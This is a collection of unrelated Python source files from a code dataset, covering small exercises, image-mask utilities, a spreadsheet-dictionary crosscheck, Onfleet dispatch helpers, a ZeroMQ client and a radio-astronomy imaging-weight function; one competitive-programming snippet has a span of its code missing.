+{"seq_id":"312561836","text":"# Determine which number occurs most often in an array\n\nimport random\n\n\ndef mostCommonValue(array: list) -> int:\n \"\"\"Returns the number that occurs most often in the array\"\"\"\n\n d = dict.fromkeys(array, 0)\n for item in array:\n d[item] += 1\n\n duplicate_key = None\n duplicate_value = 0\n for key, value in d.items():\n if value > duplicate_value:\n duplicate_value = value\n duplicate_key = key\n\n return duplicate_key\n\n\na = [random.randint(0, 10) for _ in range(20)]\nprint(f'Input array: {a}')\nprint(f'The most frequent number in the array is: {mostCommonValue(a)}')\n","sub_path":"Lesson3_Массивы/les3_task4.py","file_name":"les3_task4.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"434900092","text":"locs = []\ndirchange = {0:1, 1:0, 2:3, 3:2}\nr, c, m = map(int, input().split())\na = [[[] for _ in range(c)] for _ in range(r)]\nfor _ in range(m):\n r_, c_, s, d, z = map(int, input().split())\n a[r_-1][c_-1].append((z, s, d-1))\n locs.append((r_-1, c_-1))\ndx = [-1, 1, 0, 0]\ndy = [0, 0, 1, -1]\n\ncol = 0\ngot = []\nwhile col= r or ny < 0 or ny >= c:\n dir = dirchange[dir]\n nx, ny = cx+dx[dir], cy+dy[dir]\n cx, cy = nx, ny\n a[cx][cy].append((size, speed, dir))\n tmplocs.append((cx, cy))\n locs = set(tmplocs)\n for x_, y_ in locs:\n if len(a[x_][y_]) >= 2:\n a[x_][y_] = [sorted(a[x_][y_])[-1]]\n col += 1\n\ns = 0\nfor i in range(len(got)):\n s+= got[i][0]\nprint(s)","sub_path":"BeakjoonOJ_Solved/17143_2.py","file_name":"17143_2.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"485444354","text":"import os\r\nimport random\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n#import pydensecrf.densecrf as dcrf\r\nfrom PIL import Image\r\nimport torchvision\r\nfrom torchvision import transforms\r\n\r\n\r\n\r\n\r\ndef get_square(img, pos):\r\n \"\"\"Extract a left or 
a right square from ndarray shape : (H, W, C))\"\"\"\r\n h = img.shape[0]\r\n if pos == 0:\r\n return img[:, :h]\r\n else:\r\n return img[:, -h:]\r\n\r\n\r\ndef split_img_into_squares(img):\r\n return get_square(img, 0), get_square(img, 1)\r\n\r\n\r\ndef hwc_to_chw(img):\r\n return np.transpose(img, axes=[2, 0, 1])\r\n\r\n\r\ndef resize_and_crop(pilimg, scale=1, final_height=None, is_mask=False):\r\n w = pilimg.size[0]\r\n h = pilimg.size[1]\r\n newW = int(w * scale)\r\n newH = int(h * scale)\r\n\r\n if not final_height:\r\n diff = 0\r\n else:\r\n diff = newH - final_height\r\n\r\n if is_mask:\r\n # convert to numpy array, remove alpha channel, convert back to pilimag\r\n # otherwise pilimg resize will make the image transparent (all black)\r\n pilimg = np.array(pilimg)\r\n pilimg = pilimg[:, :, :3] # remove alpha channel\r\n img = Image.fromarray(pilimg)\r\n #pilimg = Image.fromarray(pilimg)\r\n #pilimg = pilimg.resize((newW//8, newH//8))\r\n #img = pilimg.crop((0, 0, newW//8, newH//8))\r\n # img = pilimg.torchvision.transforms.RandomCrop((newW // 8, newH // 8), padding=None, pad_if_needed=False,\r\n # fill=0, padding_mode='constant')\r\n else:\r\n #pilimg = pilimg.resize((newW // 8, newH // 8))\r\n img = pilimg.crop((0, 0, newW // 1, newH // 1))\r\n # img = pilimg.torchvision.transforms.RandomCrop((newW // 8, newH // 8), padding=None, pad_if_needed=False,\r\n # fill=0, padding_mode='constant')\r\n\r\n # plot_img_and_mask(img, img)\r\n # print(is_mask)\r\n # exit(0)\r\n #img = img.crop((0, diff // 2, newW, newH - diff // 2))\r\n return np.array(img, dtype=np.float32)\r\n\r\ndef batch(iterable, batch_size):\r\n \"\"\"Yields lists by batch\"\"\"\r\n b = []\r\n for i, t in enumerate(iterable):\r\n b.append(t)\r\n if (i + 1) % batch_size == 0:\r\n yield b\r\n b = []\r\n\r\n if len(b) > 0:\r\n yield b\r\n\r\ndef split_train_val(dataset, val_percent=0.1):\r\n dataset = list(dataset)\r\n length = len(dataset)\r\n n = int(length * val_percent)\r\n random.shuffle(dataset)\r\n return {'train': dataset[:-n], 'val': dataset[-n:]}\r\n\r\n\r\ndef normalize(x):\r\n return x / 255\r\n\r\n\r\ndef merge_masks(img1, img2, full_w):\r\n h = img1.shape[0]\r\n\r\n new = np.zeros((h, full_w), np.float32)\r\n new[:, :full_w // 2 + 1] = img1[:, :full_w // 2 + 1]\r\n new[:, full_w // 2 + 1:] = img2[:, -(full_w // 2 - 1):]\r\n\r\n return new\r\n\r\n\r\n# credits to https://stackoverflow.com/users/6076729/manuel-lagunas\r\n# def rle_encode(mask_image):\r\n# pixels = mask_image.flatten()\r\n# # We avoid issues with '1' at the start or end (at the corners of\r\n# # the original image) by setting those pixels to '0' explicitly.\r\n# # We do not expect these to be non-zero for an accurate mask,\r\n# # so this should not harm the score.\r\n# pixels[0] = 0\r\n# pixels[-1] = 0\r\n# runs = np.where(pixels[1:] != pixels[:-1])[0] + 2\r\n# runs[1::2] = runs[1::2] - runs[:-1:2]\r\n# return runs\r\n\r\n\r\ndef plot_img_and_mask(img, mask):\r\n fig = plt.figure()\r\n a = fig.add_subplot(1, 2, 1)\r\n a.set_title('Input image')\r\n plt.imshow(img)\r\n\r\n b = fig.add_subplot(1, 2, 2)\r\n b.set_title('Output mask')\r\n plt.imshow(mask)\r\n plt.show()\r\n\r\n\r\n# def dense_crf(img, output_probs):\r\n# h = output_probs.shape[0]\r\n# w = output_probs.shape[1]\r\n#\r\n# output_probs = np.expand_dims(output_probs, 0)\r\n# output_probs = np.append(1 - output_probs, output_probs, axis=0)\r\n#\r\n# d = dcrf.DenseCRF2D(w, h, 2)\r\n# U = -np.log(output_probs)\r\n# U = U.reshape((2, -1))\r\n# U = np.ascontiguousarray(U)\r\n# img = 
np.ascontiguousarray(img)\r\n#\r\n# d.setUnaryEnergy(U)\r\n#\r\n# d.addPairwiseGaussian(sxy=20, compat=3)\r\n# d.addPairwiseBilateral(sxy=30, srgb=20, rgbim=img, compat=10)\r\n#\r\n# Q = d.inference(5)\r\n# Q = np.argmax(np.array(Q), axis=0).reshape((h, w))\r\n#\r\n# return Q\r\n\r\ndef get_ids(dir):\r\n \"\"\"Returns a list of the ids in the directory\"\"\"\r\n return (f[:-8] for f in os.listdir(dir))\r\n\r\n\r\ndef split_ids(ids, n=2):\r\n \"\"\"Split each id in n, creating n tuples (id, k) for each id\"\"\"\r\n return ((id, i) for id in ids for i in range(n))\r\n\r\n\r\ndef to_cropped_imgs(ids, dir, suffix, scale, is_mask=False):\r\n \"\"\"From a list of tuples, returns the correct cropped img\"\"\"\r\n for id, pos in ids:\r\n im = resize_and_crop(Image.open(dir + id + suffix), scale=scale, is_mask=is_mask)\r\n\r\n if is_mask:\r\n # change to mask 0 or 1, 1 is for billboards\r\n im = im.any(axis=2, keepdims=True).astype(im.dtype)\r\n # import cv2\r\n # cv2.imwrite(\"test.png\", im*255)\r\n\r\n yield get_square(im, pos)\r\n\r\ndef get_imgs_and_masks(ids, dir_img, dir_mask, scale):\r\n \"\"\"Return all the couples (img, mask)\"\"\"\r\n\r\n imgs = to_cropped_imgs(ids, dir_img, '_vis.PNG', scale)\r\n\r\n # need to transform from HWC to CHW\r\n imgs_switched = map(hwc_to_chw, imgs)\r\n imgs_normalized = map(normalize, imgs_switched)\r\n\r\n masks = to_cropped_imgs(ids, dir_mask, '_coords.PNG', scale, is_mask=True)\r\n\r\n\r\n return zip(imgs_normalized, masks)\r\n\r\n\r\n# def get_full_img_and_mask(id, dir_img, dir_mask):\r\n# im = Image.open(dir_img + id + '_vis.PNG')\r\n# mask = Image.open(dir_mask + id + '_coords.PNG')\r\n# return np.array(im), np.array(mask)","sub_path":"with_aug/utils2.py","file_name":"utils2.py","file_ext":"py","file_size_in_byte":5706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"249004416","text":"# Name: CrosscheckDictionary.py\n# Version: 1.0.0 \n# Author: Glenn Abastillas\n# Date: February 9, 2016\n# Purpose: Allows the user to:\n# 1.) Check found terms' existence in dictionary (pulled from W0157340 SQL Database)\n# 2.) Add a new column stating whether or not the term was found\n# To see the script run, go to the bottom of this page. \n# - - - - - - - - - - - - -\n\"\"\"\tcompare terms/phrases in Column P [index=15] of a spreadsheet to those in the DICE Dictionary for duplicates.\n\nCrosscheckDictionary compares terms/phrases in question in Column Q [index = 16] of the YYMMDD_HHMM_ling-excerpts-CLIENT-processed_B.tsv spreadsheet (as *.txt) to terms/phrases present in the DICE Dictionary found in the SQL database in workstation W0157340. \n\nThis class uses the Spreadsheet class to load and initialize the spreadsheet file and the dictionary file for comparison. To compare, the columns containing terms in both of these files' spreadsheets are extracted and compared. If there are term matches in the dictionary, \"IN DICT\" is inserted in a newly appended column of the Spreadsheet object. If there is no match, \"NOT IN DICT\" is inserted. 
\n\"\"\"\nfrom Spreadsheet \t\t import Spreadsheet\n\nimport os\nimport time\n\nclass CrosscheckDictionary(object):\n\n\tEMPTY_CELL = \"EMPTY CELL\"\n\tIN_DICT \t= \"IN DICT\"\n\tNOT_IN_DICT = \"NOT IN DICT\"\n\n\tdef __init__(self, spreadsheetFile, dictionaryFile, spreadsheetIndex = 0, dictionaryIndex = 0):\n\t\t\"\"\"\tinitialize this object by extracting columns from the spreadsheet\n\t\t\tand the dictionary files specified.\n\n\t\t\t@param\tspreadsheetFile\t - path to spreadsheet\n\t\t\t@param\tdictionaryFile\t - path to dictionary\n\t\t\t@param\tspreadsheetIndex - index of columns to be checked\n\t\t\t@param\tdictionaryIndex\t - index of terms to check against\n\t\t\"\"\"\n\t\t# Initialize these variables using the input parameters\n\t\tself.spreadsheet, self.spreadsheetIndex, self.dictionaryIndex = self.open(spreadsheetFile, dictionaryFile, spreadsheetIndex, dictionaryIndex)\n\n\tdef open(self, spreadsheetFile, dictionaryFile, spreadsheetIndex = 0, dictionaryIndex = 0):\n\t\t\"\"\"\topen the spreadsheet file and dictionary file and extract the\n\t\t\tspecified columns for comparison.\n\n\t\t\t@param spreadsheetFile\t- path to spreadsheet file\n\t\t\t@param dictionaryFile\t- path to dictionary file\n\t\t\t@param spreadsheetIndex\t- index of terms in spreadsheet\n\t\t\t@param dictionaryIndex\t- index of terms in dictionary\n\n\t\t\t@return\ttuple (Spreadsheet object, spreadsheet, dictionary)\n\t\t\"\"\"\n\t\t# Create and initialize Spreadsheet objects for the spreadsheet file and dictionary file\n\t\tfiles = [Spreadsheet(f) for f in [spreadsheetFile, dictionaryFile]]\n\n\t\tfor s in files:\n\t\t\ts.load()\n\t\t\ts.initialize()\n\n\t\t# Make both spreadsheet (generator) and dictionary (list) for the check method\n\t\tspreadsheet = (line[spreadsheetIndex].lower() for line in files[0].spreadsheet[1:])\n\t\tdictionary = [line[dictionaryIndex].lower() for line in files[1].spreadsheet if len(line[dictionaryIndex]) > 1]\n\n\t\treturn files[0], spreadsheet, dictionary\n\n\tdef check(self, SpreadsheetObject, spreadsheet, dictionary):\n\t\t\"\"\"\tcompare the spreadsheet list and the dictionary list\n\t\t\tfor any matches and record matches in a new column.\n\n\t\t\t@param\tSpreadsheetObject - Spreadsheet object to add new column to\n\t\t\t@param\tspreadsheet - list of terms from spreadsheet\n\t\t\t@param\tdictionary - list of terms from dictionary\n\n\t\t\t@return\tSpreadsheet object with new column added\n\t\t\"\"\"\n\t\t# Set new spreadsheet header\n\t\tSpreadsheetObject.spreadsheet[0] += [\"[C] In DICE Dict?\"]\n\n\t\t# Initiate index to 1 to skip spreadsheet header\n\t\tindex = 1\n\n\t\t# Loop through the spreadsheet to be check and check term against the dictionary if it is not blank\n\t\tfor row in spreadsheet:\n\n\t\t\t# If the row is blank then say \"EMPTY CELL\"\n\t\t\tif row.isspace():\n\t\t\t\tSpreadsheetObject.spreadsheet[index] += [self.EMPTY_CELL]\n\n\t\t\t# If the row is not blank check if term in row is in the dictionary\n\t\t\telse:\n\t\t\t\t#print(\"Checking row: {0}\".format(row))\n\t\t\t\t# If the term is in the dictionary, say \"IN DICT\"\n\t\t\t\tif row in dictionary:\n\t\t\t\t\tSpreadsheetObject.spreadsheet[index] += [self.IN_DICT]\n\t\t\t\t\tprint(\"Term in dictionary: {0}\".format(row))\t\n\n\t\t\t\t# If the term is not in the dictionary, say \"NOT IN DICT\"\n\t\t\t\telse:\n\t\t\t\t\tSpreadsheetObject.spreadsheet[index] += [self.NOT_IN_DICT]\n\n\t\t\t# Increment index\n\t\t\tindex += 1\n\n\t\treturn SpreadsheetObject\n\n\tdef save(self, spreadsheet, 
outputPath):\n\t\t\"\"\"\tmake spreadsheet (list of lists) into a string and save to path.\n\n\t\t\t@param\tspreadsheet: list containing rows as list\n\t\t\t@param\toutputPath: path to save directory\n\t\t\"\"\"\n\t\t# Convert list to string for saving\n\t\tspreadsheetColumnsAdded = ('\\t'.join(line) for line in spreadsheet)\n\t\tspreadsheetNewLinesAdded = '\\n'.join(spreadsheetColumnsAdded)\n\n\t\t# Save string to file specified in path\n\t\twriteOut = open(outputPath, 'w')\n\t\twriteOut.write(spreadsheetNewLinesAdded)\n\t\twriteOut.close()\n\nif __name__==\"__main__\":\n\t\"\"\" run as a script if this file is run as a stand-alone program\n\t\"\"\"\n\n\t# Path to spreadsheet file and dictionary files\n\tspreadsheetFile = \"C:\\\\Users\\\\a5rjqzz\\\\Desktop\\\\Excel\\\\20160318 tanner\\\\test.txt\"\n\tdictionaryFile = \"C:\\\\Users\\\\a5rjqzz\\\\Documents\\\\Variants\\\\20160321_variants.txt\"\n\n\t# Index to columns in the spreadsheet and dictionary to be compared\n\tspreadsheetFileColumnIndex = 0\n\tdictionaryFileColumnIndex = 0\n\n\t# Create CrosscheckDictionary object\n\tcd = CrosscheckDictionary(spreadsheetFile, dictionaryFile, spreadsheetFileColumnIndex, dictionaryFileColumnIndex)\n\n\t# Check, then save; save() expects the underlying list of rows\n\tcd.check(cd.spreadsheet, cd.spreadsheetIndex, cd.dictionaryIndex)\n\tcd.save(cd.spreadsheet.spreadsheet, spreadsheetFile)","sub_path":"CrosscheckDictionary.py","file_name":"CrosscheckDictionary.py","file_ext":"py","file_size_in_byte":5626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"291593658","text":"# -*- coding: utf-8 -*-\n\n'''\n - Dispatching APP.\n'''\nfrom django.conf import settings\nfrom snabb.dispatching.onfleet import Onfleet\nfrom snabb.geo_utils.utils import _get_real_eta\n\n\ndef _get_eta(lat, lon):\n on = Onfleet()\n workers = on._get_workers_by_location(lat, lon)\n\n small_vehicles = ['CAR', 'MOTORCYCLE', 'BICYCLE', 'TRUCK']\n medium_vehicles = ['CAR', 'MOTORCYCLE', 'BICYCLE', 'TRUCK']\n big_vehicles = ['CAR', 'TRUCK']\n\n small_eta = \"0\"\n medium_eta = \"0\"\n big_eta = \"0\"\n\n for worker in workers['workers']:\n worker_vehicle = worker['vehicle']['type']\n worker_lon = worker['location'][0]\n worker_lat = worker['location'][1]\n\n # Only workers onDuty without active task.\n if worker['onDuty'] and worker['activeTask'] is None:\n if worker_vehicle == 'BICYCLE':\n mode = 'bicycling'\n else:\n mode = 'driving'\n current_worker_eta = _get_real_eta(\n worker_lat,\n worker_lon,\n lat,\n lon,\n mode\n )\n if worker_vehicle in small_vehicles:\n if small_eta == \"0\":\n # Only save if we don't have a better eta for this size.\n small_eta = current_worker_eta\n if worker_vehicle in medium_vehicles:\n if medium_eta == \"0\":\n # Only save if we don't have a better eta for this size.\n medium_eta = current_worker_eta\n if worker_vehicle in big_vehicles:\n if big_eta == \"0\":\n # Only save if we don't have a better eta for this size.\n big_eta = current_worker_eta\n\n if small_eta != \"0\" and medium_eta != \"0\" and big_eta != \"0\":\n # If we have the three ETAs, we don't need any more info.\n break\n\n etas = {\n 'small': small_eta,\n 'medium': medium_eta,\n 'big': big_eta\n }\n return etas\n\n\n# Team related functions\ndef _create_team(team_name):\n on = Onfleet()\n new_team = on._create_team(team_name)\n return new_team\n\n\ndef _update_team(team_name, team_id):\n on = Onfleet()\n updated_team = on._update_team(team_name, team_id)\n return updated_team\n\n\ndef _delete_team(team_id):\n on = Onfleet()\n 
deleted_team = on._delete_team(team_id)\n return deleted_team\n\n\ndef _get_team_detail(team_id):\n on = Onfleet()\n detail_team = on._get_team_detail(team_id)\n return detail_team\n\n\ndef _get_all_teams():\n on = Onfleet()\n all_teams = on._get_all_teams()\n return all_teams\n\n\n# Courier related functions\ndef _create_worker(name, phone, teams):\n on = Onfleet()\n new_courier = on._create_worker(name, phone, teams)\n return new_courier\n\n\ndef _get_worker_detail(worker_id):\n on = Onfleet()\n detail_courier = on._get_worker_detail(worker_id)\n return detail_courier\n\n\ndef _update_worker(worker_id, name=None, teams=None):\n on = Onfleet()\n updated_courier = on._update_worker(worker_id, name, teams)\n return updated_courier\n\n\ndef _delete_worker(worker_id, name=None, teams=None):\n on = Onfleet()\n deleted_courier = on._delete_worker(worker_id, name, teams)\n return deleted_courier\n\n\ndef _get_all_workers():\n on = Onfleet()\n all_workers = on._get_all_workers()\n return all_workers\n\n\n# Tasks related functions\ndef _create_task(self, destination, recipients, notes, pickupTask=False,\n completeAfter=None, completeBefore=None, container=None,\n *args, **kwargs):\n on = Onfleet()\n new_task = on._create_task(destination,\n recipients, completeAfter,\n completeBefore, pickupTask,\n notes, container)\n return new_task\n\n\ndef _get_task_detail(task_id):\n on = Onfleet()\n detail_task = on._get_task_detail(task_id)\n return detail_task\n","sub_path":"snabb/dispatching/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"224394689","text":"#!/usr/bin/python2.7\n\nimport zmq\n\ncontext = zmq.Context()\n\npullSocket = context.socket(zmq.PULL)\npullSocket.bind(\"tcp://*:42924\")\n\npushSocket = context.socket(zmq.PUSH)\npushSocket.connect(\"tcp://localhost:42923\")\n\nmessage = \"\"\n\npushSocket.send(\"addUser(Suwako,23)\")\npushSocket.send(\"displayMembers()\")\nprint(pullSocket.recv())\n\n","sub_path":"src/Client/socket.py","file_name":"socket.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"52410021","text":"# Copyright 2019 AUI, Inc. 
Washington DC, USA\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\ndef make_imaging_weight(vis_dataset, imaging_weights_parms,storage_parms):\n \"\"\"\n Creates the imaging weight data variable that has dimensions time x baseline x chan x pol (matches the visibility data variable).\n The weight density can be averaged over channels or calculated independently for each channel using imaging_weights_parms['chan_mode'].\n The following imaging weighting schemes are supported 'natural', 'uniform', 'briggs', 'briggs_abs'.\n The imaging_weights_parms['imsize'] and imaging_weights_parms['cell'] should usually be the same values that will be used for subsequent synthesis blocks (for example making the psf).\n To achieve something similar to 'superuniform' weighting in CASA tclean imaging_weights_parms['imsize'] and imaging_weights_parms['cell'] can be varied relative to the values used in subsequent synthesis blocks.\n \n Parameters\n ----------\n vis_dataset : xarray.core.dataset.Dataset\n Input visibility dataset.\n imaging_weights_parms : dictionary\n imaging_weights_parms['weighting'] : {'natural', 'uniform', 'briggs', 'briggs_abs'}, default = natural\n Weighting scheme used for creating the imaging weights.\n imaging_weights_parms['imsize'] : list of int, length = 2\n The size of the grid for gridding the imaging weights. Used when imaging_weights_parms['weighting'] is not 'natural'.\n imaging_weights_parms['cell'] : list of number, length = 2, units = arcseconds\n The size of the pixels in the fft of the grid (the image domain pixel size). Used when imaging_weights_parms['weighting'] is not 'natural'.\n imaging_weights_parms['robust'] : number, acceptable range [-2,2], default = 0.5\n Robustness parameter for Briggs weighting.\n robust = -2.0 maps to uniform weighting.\n robust = +2.0 maps to natural weighting.\n imaging_weights_parms['briggs_abs_noise'] : number, default=1.0\n Noise parameter for imaging_weights_parms['weighting']='briggs_abs' mode weighting.\n imaging_weights_parms['chan_mode'] : {'continuum'/'cube'}, default = 'continuum'\n When 'cube' the weights are calculated independently for each channel (perchanweightdensity=True in CASA tclean) and when 'continuum' a common weight density is calculated for all channels.\n imaging_weights_parms['uvw_name'] : str, default ='UVW'\n The name of uvw data variable that will be used to grid the weights. 
Used when imaging_weights_parms['weighting'] is not 'natural'.\n imaging_weights_parms['data_name'] : str, default = 'DATA'\n The name of the visibility data variable whose dimensions will be used to construct the imaging weight data variable.\n imaging_weights_parms['imaging_weight_name'] : str, default ='IMAGING_WEIGHT'\n The name of that will be used for the imaging weight data variable.\n storage_parms : dictionary\n storage_parms['to_disk'] : bool, default = False\n If true the dask graph is executed and saved to disk in the zarr format.\n storage_parms['append'] : bool, default = False\n If storage_parms['to_disk'] is True only the dask graph associated with the function is executed and the resulting data variables are saved to an existing zarr file on disk.\n Note that graphs on unrelated data to this function will not be executed or saved.\n storage_parms['outfile'] : str\n The zarr file to create or append to.\n storage_parms['chunks_on_disk'] : dict of int, default = {}\n The chunk size to use when writing to disk. This is ignored if storage_parms['append'] is True. The default will use the chunking of the input dataset.\n storage_parms['chunks_return'] : dict of int, default = {}\n The chunk size of the dataset that is returned. The default will use the chunking of the input dataset.\n storage_parms['graph_name'] : str\n The time to compute and save the data is stored in the attribute section of the dataset and storage_parms['graph_name'] is used in the label.\n storage_parms['compressor'] : numcodecs.blosc.Blosc,default=Blosc(cname='zstd', clevel=2, shuffle=0)\n The compression algorithm to use. Available compression algorithms can be found at https://numcodecs.readthedocs.io/en/stable/blosc.html.\n \n Returns\n -------\n vis_dataset : xarray.core.dataset.Dataset\n The vis_dataset will contain a new data variable for the imaging weights the name is defined by the input parameter imaging_weights_parms['imaging_weight_name'].\n \"\"\"\n print('######################### Start make_imaging_weights #########################')\n import time\n import math\n import xarray as xr\n import dask.array as da\n import matplotlib.pylab as plt\n import dask.array.fft as dafft\n import dask\n import copy, os\n from numcodecs import Blosc\n from itertools import cycle\n import zarr\n \n from ngcasa._ngcasa_utils._store import _store\n from ngcasa._ngcasa_utils._check_parms import _check_storage_parms\n from ._imaging_utils._check_imaging_parms import _check_imaging_weights_parms\n from cngi.dio import write_zarr, append_zarr\n \n _imaging_weights_parms = copy.deepcopy(imaging_weights_parms)\n _storage_parms = copy.deepcopy(storage_parms)\n \n assert(_check_imaging_weights_parms(vis_dataset,_imaging_weights_parms)), \"######### ERROR: imaging_weights_parms checking failed\"\n assert(_check_storage_parms(_storage_parms,'dataset.vis.zarr','make_imaging_weights')), \"######### ERROR: storage_parms checking failed\"\n \n \n #Check if weight or weight spectrum present\n #If both default to weight spectrum\n #If none create new\n weight_present = 'WEIGHT' in vis_dataset.data_vars\n weight_spectrum_present = 'WEIGHT_SPECTRUM' in vis_dataset.data_vars\n all_dims_dict = vis_dataset.dims\n \n vis_data_dims = vis_dataset[_imaging_weights_parms['data_name']].dims\n vis_data_chunksize = vis_dataset[_imaging_weights_parms['data_name']].data.chunksize\n \n \n if weight_present and weight_spectrum_present:\n print('Both WEIGHT and WEIGHT_SPECTRUM data variables found, will use WEIGHT_SPECTRUM to calculate', 
_imaging_weights_parms['imaging_weight_name'])\n imaging_weight = _match_array_shape(vis_dataset.WEIGHT_SPECTRUM,vis_dataset[_imaging_weights_parms['data_name']])\n elif weight_present:\n print('WEIGHT data variable found, will use WEIGHT to calculate ', _imaging_weights_parms['imaging_weight_name'])\n imaging_weight = _match_array_shape(vis_dataset.WEIGHT,vis_dataset[_imaging_weights_parms['data_name']])\n elif weight_spectrum_present:\n print('WEIGHT_SPECTRUM data variable found, will use WEIGHT_SPECTRUM to calculate ', _imaging_weights_parms['imaging_weight_name'])\n imaging_weight = _match_array_shape(vis_dataset.WEIGHT_SPECTRUM,vis_dataset[_imaging_weights_parms['data_name']])\n else:\n print('No WEIGHT or WEIGHT_SPECTRUM data variable found, will assume all weights are unity to calculate ', _imaging_weights_parms['imaging_weight_name'])\n imaging_weight = da.ones(vis_dataset[_imaging_weights_parms['data_name']].shape,chunks=vis_data_chunksize)\n \n vis_dataset[_imaging_weights_parms['imaging_weight_name']] = xr.DataArray(imaging_weight, dims=vis_dataset[_imaging_weights_parms['data_name']].dims)\n \n if _imaging_weights_parms['weighting'] != 'natural':\n calc_briggs_weights(vis_dataset,_imaging_weights_parms)\n \n list_xarray_data_variables = [vis_dataset[_imaging_weights_parms['imaging_weight_name']]]\n return _store(vis_dataset,list_xarray_data_variables,_storage_parms)\n \ndef _match_array_shape(array_to_reshape,array_to_match):\n # Reshape in_weight to match dimensionality of vis_data (vis_dataset[imaging_weights_parms['data_name']])\n # The order is assumed the same (there can be missing). array_to_reshape is a subset of array_to_match\n import dask.array as da\n import numpy as np\n \n match_array_chunksize = array_to_match.data.chunksize\n \n reshape_dims = np.ones(len(match_array_chunksize),dtype=int) #Missing dimensions will be added using reshape command\n tile_dims = np.ones(len(match_array_chunksize),dtype=int) #Tiling is used so that number of elements in each dimension match\n \n array_to_match_dims = array_to_match.dims\n array_to_reshape_dims = array_to_reshape.dims\n \n for i in range(len(match_array_chunksize)):\n if array_to_match_dims[i] in array_to_reshape_dims:\n reshape_dims[i] = array_to_match.shape[i]\n else:\n tile_dims[i] = array_to_match.shape[i]\n \n return da.tile(da.reshape(array_to_reshape.data,reshape_dims),tile_dims).rechunk(match_array_chunksize)\n
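A minimal NumPy sketch of the reshape-and-tile broadcast that _match_array_shape performs (illustrative only; the shapes are assumptions, e.g. a WEIGHT array of (time, baseline, pol) being matched against DATA of (time, baseline, chan, pol)):

import numpy as np

weight = np.ones((10, 45, 2))                   # assumed (time, baseline, pol)
reshape_dims = (10, 45, 1, 2)                   # the missing 'chan' axis becomes length 1
tile_dims = (1, 1, 64, 1)                       # tile along 'chan' to 64 channels
imaging_weight = np.tile(weight.reshape(reshape_dims), tile_dims)
assert imaging_weight.shape == (10, 45, 64, 2)  # now matches the DATA shape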
\n\n\ndef calc_briggs_weights(vis_dataset,imaging_weights_parms):\n import dask.array as da\n import xarray as xr\n import numpy as np\n from ._imaging_utils._standard_grid import _graph_standard_grid, _graph_standard_degrid\n \n \n dtr = np.pi / (3600 * 180)\n grid_parms = {}\n \n grid_parms['chan_mode'] = imaging_weights_parms['chan_mode']\n grid_parms['imsize_padded'] = imaging_weights_parms['imsize'] #do not need to pad since no fft\n grid_parms['cell'] = imaging_weights_parms['cell']\n grid_parms['do_imaging_weight'] = True\n grid_parms['uvw_name'] = imaging_weights_parms['uvw_name']\n \n grid_parms['oversampling'] = 0\n grid_parms['support'] = 1\n grid_parms['do_psf'] = True\n grid_parms['complex_grid'] = False\n grid_parms['do_imaging_weight'] = True\n grid_parms['imaging_weight_name'] = imaging_weights_parms['imaging_weight_name']\n \n cgk_1D = np.ones((1))\n grid_of_imaging_weights, sum_weight = _graph_standard_grid(vis_dataset, cgk_1D, grid_parms)\n \n \n #############Calculate Briggs parameters#############\n def calculate_briggs_parms(grid_of_imaging_weights, sum_weight, imaging_weights_parms):\n if imaging_weights_parms['weighting'] == 'briggs':\n robust = imaging_weights_parms['robust']\n briggs_factors = np.ones((2,1,1)+sum_weight.shape)\n squared_sum_weight = (np.sum(grid_of_imaging_weights**2,axis=(0,1)))\n briggs_factors[0,0,0,:,:] = (np.square(5.0*10.0**(-robust))/(squared_sum_weight/sum_weight))[None,None,:,:]\n elif imaging_weights_parms['weighting'] == 'briggs_abs':\n robust = imaging_weights_parms['robust']\n briggs_factors = np.ones((2,1,1)+sum_weight.shape)\n briggs_factors[0,0,0,:,:] = briggs_factors[0,0,0,:,:]*np.square(robust)\n briggs_factors[1,0,0,:,:] = briggs_factors[1,0,0,:,:]*2.0*np.square(imaging_weights_parms['briggs_abs_noise'])\n else:\n briggs_factors = np.zeros((2,1,1)+sum_weight.shape)\n briggs_factors[0,0,0,:,:] = np.ones((1,1,1)+sum_weight.shape)\n \n return briggs_factors\n \n #Map blocks can be simplified by using new_axis and swapping grid_of_imaging_weights and sum_weight\n briggs_factors = da.map_blocks(calculate_briggs_parms,grid_of_imaging_weights,sum_weight, imaging_weights_parms,chunks=(2,1,1)+sum_weight.chunksize,dtype=np.double)[:,0,0,:,:]\n \n imaging_weight = _graph_standard_degrid(vis_dataset, grid_of_imaging_weights, briggs_factors, cgk_1D, grid_parms)\n \n vis_dataset[imaging_weights_parms['imaging_weight_name']] = xr.DataArray(imaging_weight, dims=vis_dataset[imaging_weights_parms['data_name']].dims)\n \n\n","sub_path":"ngcasa/imaging/make_imaging_weight.py","file_name":"make_imaging_weight.py","file_ext":"py","file_size_in_byte":12045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
